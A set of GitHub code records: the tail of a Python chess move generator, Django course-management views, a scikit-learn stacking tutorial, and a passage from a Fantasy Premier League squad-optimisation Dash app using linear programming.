list of pins\n break\n\n rookMoves = ((-1, 0), (0, -1), (1, 0), (0, 1)) # up, left, down, right\n if self.whiteToMove:\n enemyColor = \"b\"\n else:\n enemyColor = \"w\"\n\n for r_move in rookMoves: # for each move in the list of rook moves\n for i in range(1, 8): # for each square in the row\n endRow = row + r_move[0] * i # get the row of the end square\n endCol = col + r_move[1] * i # get the column of the end square\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n if not piecePinned or pinDirection == r_move or pinDirection == (-r_move[0], -r_move[\n 1]): # if the piece isn't pinned or the pin direction is the same as the rook move\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece == \"--\": # if the end square is empty\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n break\n else:\n break\n else:\n break\n\n def getQueenMoves(self, row, col, possibleMoves): # get queen moves function\n self.getBishopMoves(row, col, possibleMoves) # get bishop moves\n self.getRookMoves(row, col, possibleMoves) # get rook moves\n\n def getKingMoves(self, row, col, possibleMoves): # get king moves function\n rowMoves = (-1, -1, -1, 0, 0, 1, 1, 1) # up, left, down, right\n colMoves = (-1, 0, 1, -1, 1, -1, 0, 1) # up, left, down, right\n\n if self.whiteToMove: # if the player is white\n allyColor = \"w\"\n else:\n allyColor = \"b\"\n\n for k_move in range(8): # for each move in the list of king moves\n endRow = row + rowMoves[k_move] # get the row of the end square\n endCol = col + colMoves[k_move] # get the column of the end square\n\n if 0 <= endRow <= 7 and 0 <= endCol <= 7: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] != allyColor: # if the end square is the enemy color\n\n if allyColor == 'w': # if the player is white\n self.whiteKingLocation = (endRow, endCol) # set the white king location to the end square\n else:\n self.blackKingLocation = (endRow, endCol) # set the black king location to the end square\n\n inCheck, pins, checks = self.checkForPinsAndChecks() # check for pins and checks\n\n if not inCheck: # if the king isn't in check\n possibleMoves.append(Move((row, col), (endRow, endCol),\n self.board)) # add the move to the list of possible moves\n\n if allyColor == 'w': # if the player is white\n self.whiteKingLocation = (row, col) # set the white king location to the start square\n else:\n self.blackKingLocation = (row, col) # set the black king location to the start square\n\n def getCastleMoves(self, row, col, moves, allyColor): # get castle moves function\n if self.squareUnderAttack(row, col): # if the square is under attack\n return\n if (self.whiteToMove and self.currentCastlingRights.wks) or (\n not self.whiteToMove and self.currentCastlingRights.bks): # if the player can castle kingside\n self.getKingCastleMoves(row, col, moves, allyColor) # get the king castle moves\n\n if (self.whiteToMove and self.currentCastlingRights.wqs) or (\n not self.whiteToMove and self.currentCastlingRights.bqs): # if the player can castle queenside\n self.getQeenCastleMoves(row, col, moves, allyColor) # get the queen castle moves\n\n def getKingCastleMoves(self, row, col, moves, allyColor): # get king castle moves function\n if self.board[row][col + 1] == '--' and self.board[row][\n col + 2] == '--': # if the squares in between the king and the rook are empty\n if (not self.squareUnderAttack(row, col + 1)) and (\n not self.squareUnderAttack(row, col + 2)): # if the squares are not under attack\n moves.append(Move((row, col), (row, col + 2), self.board,\n isCastleMove=True)) # add the move to the list of possible moves\n\n def getQeenCastleMoves(self, row, col, moves, allyColor): # get queen castle moves function\n if self.board[row][col - 1] == '--' and self.board[row][col - 2] == '--' and self.board[row][\n col - 3] == '--': # if the squares in between the king and the rook are empty\n if (not self.squareUnderAttack(row, col - 1)) and (\n not self.squareUnderAttack(row, col - 2)): # if the squares are not under attack\n moves.append(Move((row, col), (row, col - 2), self.board,\n isCastleMove=True)) # add the move to the list of possible moves\n\n def checkForPinsAndChecks(self): # check for pins and checks function\n pins = []\n checks = []\n inCheck = False\n if self.whiteToMove: # if the player is white\n allyColor = 'w'\n enemyColor = 'b'\n startRow = self.whiteKingLocation[0] # get the white king's row\n startCol = self.whiteKingLocation[1] # get the white king's column\n else: # if the player is black\n allyColor = 'b'\n enemyColor = 'w'\n startRow = self.blackKingLocation[0] # get the black king's row\n startCol = self.blackKingLocation[1] # get the black king's column\n\n # directions = ((-1, -1), (-1, 0), (-1, 1), (1, -1), (1, 0), (1, 1), (0, -1), (0, 1))\n directions = ((-1, 0), (0, -1), (1, 0), (0, 1), (-1, -1), (-1, 1), (1, -1), (1, 1))\n for j in range(len(directions)): # for each direction\n d = directions[j] # get the direction\n possiblePin = () # set the possible pin to an empty tuple\n for i in range(1, 8): # for each square in the direction\n endRow = startRow + d[0] * i # get the row of the end square\n endCol = startCol + d[1] * i # get the column of the end square\n\n if 0 <= endRow < 8 and 0 <= endCol < 8: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] == allyColor and endPiece[\n 1] != 'K': # if the end square is the ally color and is not a king\n if possiblePin == (): # if the possible pin is empty\n possiblePin = (\n endRow, endCol, d[0], d[1]) # set the possible pin to the end square and the direction\n else:\n break\n elif endPiece[0] == enemyColor: # if the end square is the enemy color\n type = endPiece[1]\n # print(\"Black King location\", self.blackKingLocation)\n # print(startRow, startCol,\" enemy found in direction \", d[0], d[1], enemyColor, type, endRow, endCol, i, j)\n # print((i == 1 and type == 'P' and ((enemyColor == 'w' and 6 <= j <= 7) or (enemyColor == 'b' and 4 <= j <= 5))))\n # if enemy piece found near King\n if (0 <= j <= 3 and type == 'R') or \\\n (4 <= j <= 7 and type == 'B') or \\\n (i == 1 and type == 'P' and (\n (enemyColor == 'w' and 6 <= j <= 7) or (enemyColor == 'b' and 4 <= j <= 5))) or \\\n (type == 'Q') or \\\n (i == 1 and type == 'K'): # if the enemy piece is a rook, bishop, queen, or king\n if possiblePin == (): # if the possible pin is empty\n inCheck = True # if enemy directly in range of King\n # print(\"king in check by: \", enemyColor, type, endRow, endCol)\n checks.append((endRow, endCol, d[0], d[1]))\n break\n else:\n pins.append(possiblePin) # if ally piece in between king and enemy\n break\n else:\n break # if no enemy found the respective direction that poses threat\n else:\n break\n\n # Special Case for Knight Moves\n knightMoves = ((-1, -2), (-1, 2), (1, -2), (1, 2), (-2, -1), (-2, 1), (2, -1), (2, 1))\n for m in knightMoves: # for each knight move\n endRow = startRow + m[0] # get the row of the end square\n endCol = startCol + m[1] # get the column of the end square\n if 0 <= endRow < 8 and 0 <= endCol < 8: # if the end square is on the board\n endPiece = self.board[endRow][endCol] # get the piece at the end square\n if endPiece[0] == enemyColor and endPiece[\n 1] == 'N': # if the end square is the enemy color and is a knight\n inCheck = True # if enemy directly in range of King\n checks.append((endRow, endCol, m[0], m[1])) # add the check to the list of checks\n return inCheck, pins, checks\n\n\nclass CastleRights(): # class for castle rights\n def __init__(self, wks, bks, wqs, bqs): # constructor\n self.wks = wks\n self.bks = bks\n self.wqs = wqs\n self.bqs = bqs\n\n\nclass Move():\n ranksToRows = {\"1\": 7,\n \"2\": 6,\n \"3\": 5,\n \"4\": 4,\n \"5\": 3,\n \"6\": 2,\n \"7\": 1,\n \"8\": 0} # dictionary for converting ranks to rows\n rowsToRanks = {v: k for k, v in ranksToRows.items()}\n\n filesToCols = {\"a\": 0, \"b\": 1, \"c\": 2, \"d\": 3, \"e\": 4, \"f\": 5, \"g\": 6,\n \"h\": 7} # dictionary for converting files to columns\n colsToFiles = {v: k for k, v in filesToCols.items()} # constructor\n\n def __init__(self, startSq, endSq, board, isEnpassantMove=False, isCastleMove=False, AIPromotionKey='Q',\n AIPlaying=False): # constructor\n self.startRow = startSq[0] # get the start row\n self.startCol = startSq[1] # get the start column\n self.endRow = endSq[0] # get the end row\n self.endCol = endSq[1] # get the end column\n self.pieceMoved = board[self.startRow][self.startCol] # get the piece that was moved\n self.pieceCaptured = board[self.endRow][self.endCol] # get the piece that was captured\n\n # For AI:\n self.AIPromotionKey = AIPromotionKey # get the promotion key\n self.AIPlaying = AIPlaying # get the AI playing boolean\n\n # For Pawn Promotion:\n self.isPawnPromotion = False\n if (self.pieceMoved == 'wP' and self.endRow == 0) or (\n self.pieceMoved == 'bP' and self.endRow == 7): # if the pawn is at the end of the board\n self.isPawnPromotion = True # set the pawn promotion boolean to true\n\n # For Enpassant Move:\n self.isEnpassantMove = isEnpassantMove # get the enpassant move boolean\n if self.isEnpassantMove: # if the move is an enpassant move\n if self.pieceMoved == 'wP':\n self.pieceCaptured = 'bP'\n else:\n self.pieceCaptured = 'wP'\n\n self.isCastleMove = isCastleMove # get the castle move boolean\n self.moveID = self.startRow * 1000 + self.startCol * 100 + self.endRow * 10 + self.endCol # get the move ID\n\n def __eq__(self, other): # overloaded equality operator\n if isinstance(other, Move): # if the other object is a move\n return self.moveID == other.moveID # return the move ID of the move\n\n def getChessNotation(self): # get the chess notation of the move\n return self.getRankFile(self.startRow, self.startCol) + self.getRankFile(self.endRow,\n self.endCol) # return the chess notation of the move\n\n def getRankFile(self, row, col): # get the rank and file of the square\n return self.colsToFiles[col] + self.rowsToRanks[row] # return the rank and file of the square\n","repo_name":"Daymenion/Machine-Learning-Example-Projects","sub_path":"Chess Engine Alpha-Beta Punning and MinMax Search/Engine.py","file_name":"Engine.py","file_ext":"py","file_size_in_byte":38583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"21761089453","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom Database.models import BuyRecord, Course # 用户购买课程的记录\nfrom Tools.SessionManager import SessionManager\nfrom Tools.URLPath import url_index, url_course_view_course\nfrom .forms import AddCourseForm, ModCourseForm\n\n\ndef viewCourse(request): # 查看课程信息\n sessionManager = SessionManager(request)\n if sessionManager.isAdministrator(): #如果是管理员登陆\n courses = Course.objects.all() # 查询全部课程信息\n Authority = 'Admin'\n\n else: #如果是客户登陆\n courses = Course.objects.filter(course_flag=True) # 查询在使用的课程信息\n Authority = 'Customer'\n\n return render(request, 'coursemessageUI.html', {'order': courses, 'Authority': Authority})\n\n\ndef viewCourseDetails(request, coursename): # 显示课程的详细信息\n sessionManager = SessionManager(request)\n if sessionManager.isAdministrator(): #如果是管理员登陆\n courses = Course.objects.get(coursename=coursename) # 查询当前课程信息,为了后面显示详细信息\n detailcourse = BuyRecord.objects.filter(coursename=coursename) # 查询这个课程的所有订单(包括付钱和没付钱的)\n Authority = 'Admin'\n\n else: #如果是客户登陆\n username = sessionManager.getUsername() # 获取当前登录的用户名字\n courses = Course.objects.get(coursename=coursename) # 查询当前课程信息,为了后面显示详细信息\n detailcourse = BuyRecord.objects.filter(username=username,coursename=coursename) # 查询这个用户关于这门课的订单状态(付钱和没付钱的)\n Authority = 'Customer'\n return render(request, 'detailmessageUI.html', {'Authority': Authority, 'courses':courses,'order1': detailcourse})\n\n\ndef addCourse(request): # 管理员增加课程信息\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n if request.method == 'POST':\n addcourseForm = AddCourseForm(request.POST)\n if addcourseForm.is_valid():\n coursename = addcourseForm.cleaned_data.get('coursename')\n courseintroduction = addcourseForm.cleaned_data.get('courseintroduction')\n courseprice = addcourseForm.cleaned_data.get('courseprice')\n course = Course()\n course.create(coursename,courseintroduction,courseprice)\n return HttpResponseRedirect(url_course_view_course)\n else:\n addcourseForm = AddCourseForm()\n Authority = 'Admin'\n return render(request, 'addcourseUI.html', locals())\n\n\ndef ModCourse(request, coursename): # 修改课程信息界面\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n if request.method == 'POST': # 如果请求为表单提交\n modcourseForm = ModCourseForm(request.POST) # 获取表单内容\n if modcourseForm.is_valid(): # 解析表单\n courseintroduction = modcourseForm.cleaned_data['courseintroduction']\n courseprice = modcourseForm.cleaned_data['courseprice']\n R = Course.objects.get(coursename=coursename) # 查询当前修改信息的课程对象\n R.setCourseIntroduction(courseintroduction)\n R.setCoursePrice(courseprice)\n return HttpResponseRedirect(url_course_view_course) # 写成功之后,跳转到查看课程\n else:\n r = Course.objects.get(coursename=coursename) # 查询当前课程的信息\n modcourseForm = ModCourseForm(instance=r) # 创建表单\n return render(request, 'modcourseUI.html', locals())\n\n\ndef DelCourse(request, coursename): # 执行下架操作\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n P = Course.objects.get(coursename=coursename) # 先获取当前课程信息\n P.setCourseFlag(False) # 下架课程\n Authority = 'Admin'\n return render(request, 'successfulUI.html', locals())\n\n\ndef reAddCourse(request, coursename): # 执行重新上架操作\n sessionManager = SessionManager(request)\n if not sessionManager.isAdministrator():\n return HttpResponseRedirect(url_index)\n P = Course.objects.get(coursename=coursename) # 先获取当前课程信息\n P.setCourseFlag(True) # 重新上架课程\n return render(request, 'successfulUI.html', locals())\n\n","repo_name":"shao0099876/AmyYoga","sub_path":"AmyYoga/AmyYoga/Course/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"6428877716","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import cross_validation\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import metrics\n# Classifiers\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\n\nnp.random.seed(2017) # seed to shuffle the train set\n\n# read the data in\ndf = pd.read_csv(\"chapter4/Diabetes.csv\")\n\nX = df.ix[:,0:8] # independent variables\ny = df['class'].values # dependent variables\n\n#Normalize\nX = StandardScaler().fit_transform(X)\n\n# evaluate the model by splitting into train and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,random_state=2017)\nkfold = cross_validation.StratifiedKFold(y=y_train, n_folds=5, random_state=2017)\nnum_trees = 10\n\nverbose = True # to print the progress\n\nclfs = [KNeighborsClassifier(),RandomForestClassifier(n_estimators=num_trees, random_state=2017),\n GradientBoostingClassifier(n_estimators=num_trees, random_state=2017)]\n\n#Creating train and test sets for blending\ndataset_blend_train = np.zeros((X_train.shape[0], len(clfs)))\ndataset_blend_test = np.zeros((X_test.shape[0], len(clfs)))\n\nprint('5-fold cross validation:\\n')\n\nfor i, clf in enumerate(clfs):\n scores = cross_validation.cross_val_score(clf, X_train, y_train, cv=kfold,scoring='accuracy')\n print(\"##### Base Model %0.0f #####\" % i)\n print(\"Train CV Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std()))\n clf.fit(X_train, y_train)\n print(\"Train Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(X_train),y_train)))\n dataset_blend_train[:,i] = clf.predict_proba(X_train)[:, 1]\n dataset_blend_test[:,i] = clf.predict_proba(X_test)[:, 1]\n print(\"Test Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(X_test),y_test)))\n\nprint (\"##### Meta Model #####\")\nclf = LogisticRegression()\nscores = cross_validation.cross_val_score(clf, dataset_blend_train, y_train,\ncv=kfold, scoring='accuracy')\nclf.fit(dataset_blend_train, y_train)\n\nprint(\"Train CV Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std()))\nprint(\"Train Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(dataset_blend_train), y_train)))\nprint(\"Test Accuracy: %0.2f \" % (metrics.accuracy_score(clf.predict(dataset_blend_test), y_test)))","repo_name":"raja21068/Machine-Learning-Toturials","sub_path":"78_Stacking.py","file_name":"78_Stacking.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"18703713466","text":"import os\nimport pdb\nimport pulp\nimport random\nimport shap\nfrom pathlib import Path\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output, State\nfrom app import app\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport plotly.graph_objects as go\nimport plotly.express as px\n\nfrom fastai.tabular import load_learner\n\ntry:\n from layouts.layout_utils import make_table, make_dropdown, make_line_plot\n from scripts.data_loader import DataLoader, check_cache_validity\n from scripts.data_processor import DataProcessor\n from scripts.data_scrape import DataScraper\n from scripts.utils import load_config\n from app import cache\n from scripts.data_preparation import ModelDataMaker\n from scripts.model_data_ingestion import DataIngestor\n from scripts.feature_engineering import make_XY_data\n from scripts.models import load_data, train_lgbm_model, train_fastai_model\nexcept:\n raise ImportError\n\nCONFIG_2020 = {\n \"data_dir\": \"./data/model_data/2020_21/\",\n \"file_fixture\": \"fixtures.csv\",\n \"file_team\": \"teams.csv\",\n \"file_gw\": \"merged_gw.csv\",\n \"file_player\": \"players_raw.csv\",\n \"file_understat_team\": \"understat_team_data.pkl\",\n \"scoring_gw\": \"NA\"\n}\n\nTIMEOUT = 3600\n\n\ndef add_position_dummy(df):\n for p in df.position.unique():\n df['is_' + str(p).lower()] = np.where(df.position == p, int(1), int(0))\n return df\n\n\ndef add_team_dummy(df):\n for t in df.team.unique():\n df['team_' + str(t).lower()] = np.where(df.team == t, int(1), int(0))\n return df\n\n\ndef squad_optimizer(df, formation, budget=100.0, optimise_on='LGBM Point'):\n df = df.pipe(add_position_dummy)\n df = df.pipe(add_team_dummy)\n players = df[\"name\"].unique().tolist()\n fpl_problem = pulp.LpProblem('FPL', pulp.LpMaximize)\n # create a dictionary of pulp variables with keys from names\n x = pulp.LpVariable.dict('x_ % s', players, lowBound=0, upBound=1, cat=pulp.LpInteger)\n # player score data\n player_points = dict(zip(df[\"name\"], np.array(df[optimise_on])))\n # objective function\n fpl_problem += sum([player_points[i] * x[i] for i in players])\n # constraints\n position_names = ['gk', 'def', 'mid', 'fwd']\n position_constraints = [int(i) for i in formation.split('-')]\n constraints = dict(zip(position_names, position_constraints))\n constraints['total_cost'] = budget\n constraints['team'] = 3\n # could get straight from dataframe...\n player_cost = dict(zip(df[\"name\"], df[\"cost\"]))\n player_position = dict(zip(df[\"name\"], df[\"position\"]))\n player_team = dict(zip(df[\"name\"], df[\"team\"]))\n player_gk = dict(zip(df[\"name\"], df[\"is_gk\"]))\n player_def = dict(zip(df[\"name\"], df[\"is_def\"]))\n player_mid = dict(zip(df[\"name\"], df[\"is_mid\"]))\n player_fwd = dict(zip(df[\"name\"], df[\"is_fwd\"]))\n # apply the constraints\n fpl_problem += sum([player_cost[i] * x[i] for i in players]) <= float(constraints['total_cost'])\n fpl_problem += sum([player_gk[i] * x[i] for i in players]) == constraints['gk']\n fpl_problem += sum([player_def[i] * x[i] for i in players]) == constraints['def']\n fpl_problem += sum([player_mid[i] * x[i] for i in players]) == constraints['mid']\n fpl_problem += sum([player_fwd[i] * x[i] for i in players]) == constraints['fwd']\n for t in df.team:\n player_team = dict(zip(df[\"name\"], df['team_' + str(t).lower()]))\n fpl_problem += sum([player_team[i] * x[i] for i in players]) <= constraints['team']\n # solve the thing\n fpl_problem.solve()\n\n total_points = 0.\n total_cost = 0.\n optimal_squad = []\n\n for p in players:\n if x[p].value() != 0:\n total_points += player_points[p]\n total_cost += player_cost[p]\n\n optimal_squad.append({\n 'name': p,\n # 'team': player_team[p],\n 'position': player_position[p],\n 'cost': player_cost[p],\n 'points': player_points[p]\n })\n\n solution_info = {\n 'formation': formation,\n 'total_points': total_points,\n 'total_cost': total_cost\n }\n df_squad = pd.DataFrame(optimal_squad)\n df_squad = df_squad.sort_values(by=['position', 'points'], ascending=False)\n return df_squad, solution_info\n\n\ndef transfer_optimizer(df_leads, manager_id, num_transfers, model_name):\n\n df_leads[\"name\"] = df_leads[\"name\"].apply(lambda x: str(x).encode('ascii', 'ignore'))\n config = load_config()\n data_loader = DataLoader(config)\n df_team = pd.DataFrame(data_loader.get_manager_current_gw_picks(manager_id))\n df_team = df_team.rename(columns={\"element\": \"player_id\"})\n bank = data_loader.get_manager_bank_balance(manager_id)\n\n df_cost = df_leads[[\"player_id\", \"cost\", \"name\", model_name]].copy()\n df_team = pd.merge(df_team, df_cost, how='inner', on='player_id')\n prev_score = df_team[model_name].sum()\n\n budget = df_team[\"cost\"].sum() + bank\n\n # print(df_team.head())\n # print(df_leads.head())\n # print(budget)\n\n # optimization\n\n df = df_leads.copy()\n df = df.pipe(add_position_dummy)\n df = df.pipe(add_team_dummy)\n players = df[\"name\"].unique().tolist()\n current_players = df_team[\"name\"].unique().tolist()\n fpl_problem = pulp.LpProblem('FPL_Transfers', pulp.LpMaximize)\n\n x = pulp.LpVariable.dict('x_ % s', players, lowBound=0, upBound=1, cat=pulp.LpInteger)\n # player score data\n player_points = dict(zip(df[\"name\"], np.array(df[model_name])))\n # objective function\n fpl_problem += sum([player_points[i] * x[i] for i in players])\n # constraints\n position_names = ['gk', 'def', 'mid', 'fwd']\n formation = '2-5-5-3'\n position_constraints = [int(i) for i in formation.split('-')]\n constraints = dict(zip(position_names, position_constraints))\n constraints['total_cost'] = budget\n constraints['team'] = 3\n constraints[\"num_keep\"] = 15 - num_transfers\n\n # could get straight from dataframe...\n player_cost = dict(zip(df[\"name\"], df[\"cost\"]))\n player_position = dict(zip(df[\"name\"], df[\"position\"]))\n player_team = dict(zip(df[\"name\"], df[\"team\"]))\n player_gk = dict(zip(df[\"name\"], df[\"is_gk\"]))\n player_def = dict(zip(df[\"name\"], df[\"is_def\"]))\n player_mid = dict(zip(df[\"name\"], df[\"is_mid\"]))\n player_fwd = dict(zip(df[\"name\"], df[\"is_fwd\"]))\n # apply the constraints\n fpl_problem += sum([player_cost[i] * x[i] for i in players]) <= float(constraints['total_cost'])\n fpl_problem += sum([player_gk[i] * x[i] for i in players]) == constraints['gk']\n fpl_problem += sum([player_def[i] * x[i] for i in players]) == constraints['def']\n fpl_problem += sum([player_mid[i] * x[i] for i in players]) == constraints['mid']\n fpl_problem += sum([player_fwd[i] * x[i] for i in players]) == constraints['fwd']\n fpl_problem += sum([x[i] for i in current_players]) == constraints['num_keep']\n\n # team constraints\n for t in df.team:\n player_team = dict(zip(df[\"name\"], df['team_' + str(t).lower()]))\n fpl_problem += sum([player_team[i] * x[i] for i in players]) <= constraints['team']\n # solve the thing\n fpl_problem.solve()\n\n total_points = 0.\n total_cost = 0.\n optimal_squad = []\n\n for p in players:\n if x[p].value() != 0:\n total_points += player_points[p]\n total_cost += player_cost[p]\n\n optimal_squad.append({\n 'name': p,\n # 'team': player_team[p],\n 'position': player_position[p],\n 'cost': player_cost[p],\n 'points': player_points[p]\n })\n\n solution_info = {\n 'formation': formation,\n 'total_points': total_points,\n 'total_cost': total_cost\n }\n # pdb.set_trace()\n df_squad = pd.DataFrame(optimal_squad)\n now_score = df_squad[\"points\"].sum()\n new_squad = set(df_squad[\"name\"].unique().tolist())\n current_players = set(current_players)\n transfer_in = list(new_squad.difference(current_players))\n transfer_out = list(current_players.difference(new_squad))\n transfer_in = [in_player.decode('utf-8') for in_player in transfer_in]\n transfer_out = [out_player.decode('utf-8') for out_player in transfer_out]\n df_res = pd.DataFrame()\n gain = [0 for i in range(len(transfer_in))]\n gain[-1] = now_score - prev_score\n df_res[\"Transfer In\"] = transfer_in\n df_res[\"Transfer Out\"] = transfer_out\n df_res[\"gain\"] = gain\n df_res[\"gain\"] = df_res[\"gain\"].round(2)\n df_res[\"gain\"] = df_res[\"gain\"].astype(str)\n df_res[\"gain\"] = df_res[\"gain\"].apply(lambda y: \"\" if int(float(y)) == 0 else y)\n df_res = df_res.rename(columns={\"gain\": \"Gain\"})\n return df_res\n\n\n@cache.memoize(timeout=TIMEOUT)\ndef load_leads(gw_id):\n data_maker = ModelDataMaker(CONFIG_2020)\n output_dir = \"./data/model_outputs/\"\n lgbm_point_path = os.path.join(output_dir, \"lgbm_point_predictions_gw_{}.csv\".format(gw_id))\n lgbm_potential_path = os.path.join(output_dir, \"lgbm_potential_predictions_gw_{}.csv\".format(gw_id))\n lgbm_return_path = os.path.join(output_dir, \"lgbm_return_predictions_gw_{}.csv\".format(gw_id))\n\n fastai_point_path = os.path.join(output_dir, \"fastai_point_predictions_gw_{}.csv\".format(gw_id))\n fastai_potential_path = os.path.join(output_dir, \"fastai_potential_predictions_gw_{}.csv\".format(gw_id))\n fastai_return_path = os.path.join(output_dir, \"fastai_return_predictions_gw_{}.csv\".format(gw_id))\n all_paths = [lgbm_point_path, lgbm_potential_path, lgbm_return_path,\n fastai_point_path, fastai_potential_path, fastai_return_path]\n dfs = []\n for file_path in all_paths:\n if not check_cache_validity(file_path, valid_days=2.0):\n return html.P(\"refresh model scores\")\n df = pd.read_csv(file_path)\n dfs.append(df)\n XY_train, XY_test, XY_scoring, features_dict = load_data(gw_id)\n player_id_team_id_map = data_maker.get_player_id_team_id_map()\n player_id_player_name_map = data_maker.get_player_id_player_name_map()\n player_id_player_position_map = data_maker.get_player_id_player_position_map()\n team_id_team_name_map = data_maker.get_team_id_team_name_map()\n player_id_cost_map = data_maker.get_player_id_cost_map()\n player_id_play_chance_map = data_maker.get_player_id_play_chance_map()\n player_id_selection_map = data_maker.get_player_id_selection_map()\n player_id_ave_points_map = data_maker.get_player_id_ave_points_map()\n\n df_leads = pd.DataFrame()\n df_leads[\"player_id\"] = XY_scoring[\"player_id\"].values\n df_leads[\"name\"] = df_leads[\"player_id\"].apply(lambda x: player_id_player_name_map.get(x, x))\n df_leads[\"team\"] = df_leads[\"player_id\"].apply(lambda x: team_id_team_name_map[player_id_team_id_map.get(x, x)])\n df_leads[\"next_opponent\"] = XY_scoring[\"opp_team_id\"].apply(lambda x: team_id_team_name_map.get(x, x))\n df_leads[\"position\"] = df_leads[\"player_id\"].apply(lambda x: player_id_player_position_map.get(x, x))\n df_leads[\"chance_of_play\"] = df_leads[\"player_id\"].apply(lambda x: player_id_play_chance_map.get(x, x))\n df_leads[\"cost\"] = df_leads[\"player_id\"].apply(lambda x: player_id_cost_map.get(x, x))\n df_leads[\"selection_pct\"] = df_leads[\"player_id\"].apply(lambda x: player_id_selection_map.get(x, x))\n df_leads[\"ave_pts\"] = df_leads[\"player_id\"].apply(lambda x: player_id_ave_points_map.get(x, x))\n df_leads[\"gw\"] = gw_id\n df_leads = df_leads.drop_duplicates(subset=[\"player_id\"])\n\n # merge predictions\n for df in dfs:\n df = df.drop_duplicates()\n df_leads = pd.merge(df_leads, df, how='left', on=['player_id', 'gw'])\n df_leads[\"cost\"] = df_leads[\"cost\"] / 10\n\n model_name_col_map = {\n \"LGBM Point\": \"lgbm_point_pred\",\n \"LGBM Potential\": \"lgbm_potential_pred\",\n \"LGBM Return\": \"lgbm_return_pred\",\n \"Fast Point\": \"fastai_point_pred\",\n \"Fast Potential\": \"fastai_potential_pred\",\n \"Fast Return\": \"fastai_return_pred\"\n }\n col_model_name_map = dict()\n for k, v in model_name_col_map.items():\n col_model_name_map[v] = k\n\n df_leads = df_leads.rename(columns=col_model_name_map)\n df_leads[\"Net\"] = (2 * df_leads[\"LGBM Point\"] + df_leads[\"LGBM Potential\"] +\n 2 * df_leads[\"Fast Point\"] + df_leads[\"Fast Potential\"]) * df_leads[\"Fast Return\"] * df_leads[\n \"LGBM Return\"]\n max_net = df_leads[\"Net\"].max()\n df_leads[\"Net\"] = df_leads[\"Net\"] / max_net\n return df_leads\n\n\n@app.callback(Output('player-compare-output', 'children'),\n [Input('player-selection-dropdown-a', 'value'),\n Input('player-selection-dropdown-b', 'value'),\n Input('gw-selection-dropdown-squad', 'value')],\n prevent_initial_call=True)\ndef execute_player_comparison(player_a, player_b, gw_id):\n if not player_a:\n msg = html.P(\"Please select first player\")\n return msg\n if not player_b:\n msg = html.P(\"Please select second player\")\n return msg\n if not gw_id:\n msg = html.P(\"Please select gameweek in left layout\")\n return msg\n #\n df_leads = load_leads(gw_id)\n\n # normalization\n pot_div = 12\n point_div = 6\n retrun_div = 0.8\n\n df_leads[\"LGBM Potential\"] = df_leads[\"LGBM Potential\"] / pot_div\n df_leads[\"Fast Potential\"] = df_leads[\"Fast Potential\"] / pot_div\n df_leads[\"LGBM Point\"] = df_leads[\"LGBM Point\"] / point_div\n df_leads[\"Fast Point\"] = df_leads[\"Fast Point\"] / point_div\n df_leads[\"LGBM Return\"] = df_leads[\"LGBM Return\"] / 0.8\n df_leads[\"Fast Return\"] = df_leads[\"Fast Return\"] / 0.4\n df_leads[\"Net\"] = df_leads[\"Net\"] / 0.4\n df_leads[\"Cost\"] = df_leads[\"cost\"] / 10.0\n\n df_a = df_leads[df_leads[\"name\"] == player_a].copy()\n df_b = df_leads[df_leads[\"name\"] == player_b].copy()\n keep_cols = [\"LGBM Point\", \"LGBM Potential\", \"LGBM Return\",\n \"Fast Point\", \"Fast Potential\", \"Fast Return\", \"Cost\"]\n df_a = df_a[keep_cols].copy().T.reset_index()\n df_a.columns = [\"theta\", \"r\"]\n\n df_b = df_b[keep_cols].copy().T.reset_index()\n df_b.columns = [\"theta\", \"r\"]\n\n # pdb.set_trace()\n fig = go.Figure()\n fig.add_trace(go.Scatterpolar(r=df_a['r'].values, theta=df_a[\"theta\"].values,\n fill='toself', name=player_a))\n fig.add_trace(go.Scatterpolar(r=df_b['r'].values, theta=df_b[\"theta\"].values,\n fill='toself', name=player_b))\n fig.update_layout(polar=dict(radialaxis=dict(visible=False)), showlegend=True)\n # fig = px.line_polar(df_a, r='r', theta='theta', line_close=True)\n graph = dcc.Graph(figure=fig)\n return graph\n\n\n@app.callback([Output('squad-optim-output-play-xi', 'children'),\n Output('squad-optim-output-bench', 'children')],\n [Input('squad-optimization-btn', 'n_clicks')],\n [State('gw-selection-dropdown-squad', 'value'),\n State('model-selection-dropdown-optim', 'value'),\n State('formation-selection-dropdown-squad', 'value'),\n State('squad-value-input', 'value'),\n State('bench-value-input', 'value'),\n 